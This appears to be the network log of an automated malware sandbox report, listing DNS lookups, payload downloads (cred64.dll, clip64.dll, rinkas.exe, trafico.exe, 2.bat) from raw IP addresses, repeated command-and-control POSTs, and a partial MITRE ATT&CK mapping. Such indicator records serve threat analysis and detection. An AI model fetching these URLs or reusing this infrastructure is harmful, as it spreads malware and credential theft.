142.9.123.176.in-addr.arpa

Remote address:

8.8.8.8:53

Request

142.9.123.176.in-addr.arpa

IN PTR

Response
GET

http://77.91.124.1/theme/Plugins/cred64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/cred64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:35:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET

http://77.91.124.1/theme/Plugins/clip64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/clip64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 200 OK

Date: Sun, 08 Oct 2023 16:35:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
ETag: "16400-60691507c5cc0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
DNS

2.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.173.189.20.in-addr.arpa

IN PTR

Response

77.91.68.29:80

http://77.91.68.29/fks/

http

112.1kB
2.5MB
1812
1860

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.68.52:80

http://77.91.68.52/fuza/2.bat

http

435 B
592 B
6
5

HTTP Request

GET http://77.91.68.52/fuza/2.bat

HTTP Response

200
5.42.65.80:80

http://5.42.65.80/rinkas.exe

http

4.0kB
209.5kB
84
161

HTTP Request

GET http://5.42.65.80/rinkas.exe

HTTP Response

200
185.216.70.222:80

http://185.216.70.222/trafico.exe

http

7.8kB
449.0kB
166
325

HTTP Request

GET http://185.216.70.222/trafico.exe

HTTP Response

200
45.9.190.201:80

http://45.9.190.201/Altchrome_TB.exehttp://45.9.190.201/Altchrome_TB.exe

http

478 B
703 B
6
5

HTTP Request

GET http://45.9.190.201/Altchrome_TB.exehttp://45.9.190.201/Altchrome_TB.exe

HTTP Response

404
5.42.92.211:80

http://5.42.92.211/loghub/master

http

AppLaunch.exe

752 B
436 B
6
4

HTTP Request

POST http://5.42.92.211/loghub/master

HTTP Response

200
142.250.179.141:443

accounts.google.com

tls

msedge.exe

909 B
4.8kB
8
8
142.250.179.141:443

accounts.google.com

tls

msedge.exe

909 B
4.8kB
8
7
142.250.179.141:443

accounts.google.com

tls

msedge.exe

909 B
4.8kB
8
8
157.240.201.35:443

www.facebook.com

tls

msedge.exe

20.7kB
327.2kB
162
263
157.240.201.35:443

www.facebook.com

tls

msedge.exe

897 B
2.7kB
7
5
157.240.210.14:443

static.xx.fbcdn.net

tls

msedge.exe

897 B
2.6kB
7
5
157.240.210.14:443

static.xx.fbcdn.net

tls

msedge.exe

15.9kB
379.3kB
241
356
157.240.210.14:443

static.xx.fbcdn.net

tls

msedge.exe

943 B
2.9kB
8
6
157.240.210.14:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.210.14:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.210.14:443

static.xx.fbcdn.net

tls

msedge.exe

897 B
2.6kB
7
5
157.240.210.35:443

facebook.com

tls

msedge.exe

1.7kB
3.6kB
13
13
77.91.124.1:80

http://77.91.124.1/theme/index.php

http

explothe.exe

512 B
365 B
6
5

HTTP Request

POST http://77.91.124.1/theme/index.php

HTTP Response

200
157.240.210.35:443

fbcdn.net

tls

msedge.exe

1.9kB
5.3kB
15
17
176.123.9.142:37637

1158.exe

1.3MB
19.9kB
930
315
77.91.124.55:19071

2eq139gc.exe

260 B
5
77.91.124.55:19071

AppLaunch.exe

260 B
5
5.42.65.80:80

http://5.42.65.80/8bmeVwqx/index.php

http

oneetx.exe

468 B
367 B
5
4

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.55:19071

2eq139gc.exe

260 B
5
77.91.124.1:80

http://77.91.124.1/theme/Plugins/clip64.dll

http

explothe.exe

4.2kB
101.8kB
79
78

HTTP Request

GET http://77.91.124.1/theme/Plugins/cred64.dll

HTTP Response

404

HTTP Request

GET http://77.91.124.1/theme/Plugins/clip64.dll

HTTP Response

200
77.91.124.55:19071

2eq139gc.exe

260 B
5
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.55:19071

2eq139gc.exe

260 B
5
77.91.124.55:19071

AppLaunch.exe

260 B
5

8.8.8.8:53

14.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.160.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

146.78.124.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

146.78.124.51.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

26.35.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

26.35.223.20.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

158.240.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

158.240.127.40.in-addr.arpa
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

52.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

52.68.91.77.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

222.70.216.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

222.70.216.185.in-addr.arpa
8.8.8.8:53

201.190.9.45.in-addr.arpa

dns

71 B
137 B
1
1

DNS Request

201.190.9.45.in-addr.arpa
8.8.8.8:53

157.123.68.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

157.123.68.40.in-addr.arpa
8.8.8.8:53

1.208.79.178.in-addr.arpa

dns

71 B
116 B
1
1

DNS Request

1.208.79.178.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

254.177.238.8.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

254.177.238.8.in-addr.arpa
8.8.8.8:53

211.92.42.5.in-addr.arpa

dns

70 B
83 B
1
1

DNS Request

211.92.42.5.in-addr.arpa
8.8.8.8:53

accounts.google.com

dns

msedge.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
8.8.8.8:53

141.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

141.179.250.142.in-addr.arpa
8.8.8.8:53

www.facebook.com

dns

msedge.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.201.35
8.8.8.8:53

static.xx.fbcdn.net

dns

msedge.exe

65 B
104 B
1
1

DNS Request

static.xx.fbcdn.net

DNS Response

157.240.210.14
8.8.8.8:53

35.201.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.201.240.157.in-addr.arpa
8.8.8.8:53

14.210.240.157.in-addr.arpa

dns

73 B
117 B
1
1

DNS Request

14.210.240.157.in-addr.arpa
8.8.8.8:53

facebook.com

dns

msedge.exe

58 B
74 B
1
1

DNS Request

facebook.com

DNS Response

157.240.210.35
8.8.8.8:53

fbcdn.net

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbcdn.net

DNS Response

157.240.210.35
8.8.8.8:53

fbsbx.com

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbsbx.com

DNS Response

157.240.210.35
8.8.8.8:53

35.210.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.210.240.157.in-addr.arpa
8.8.8.8:53

1.124.91.77.in-addr.arpa

dns

70 B
83 B
1
1

DNS Request

1.124.91.77.in-addr.arpa
224.0.0.251:5353

msedge.exe

572 B
9
8.8.8.8:53

142.9.123.176.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

142.9.123.176.in-addr.arpa
8.8.8.8:53

2.173.189.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery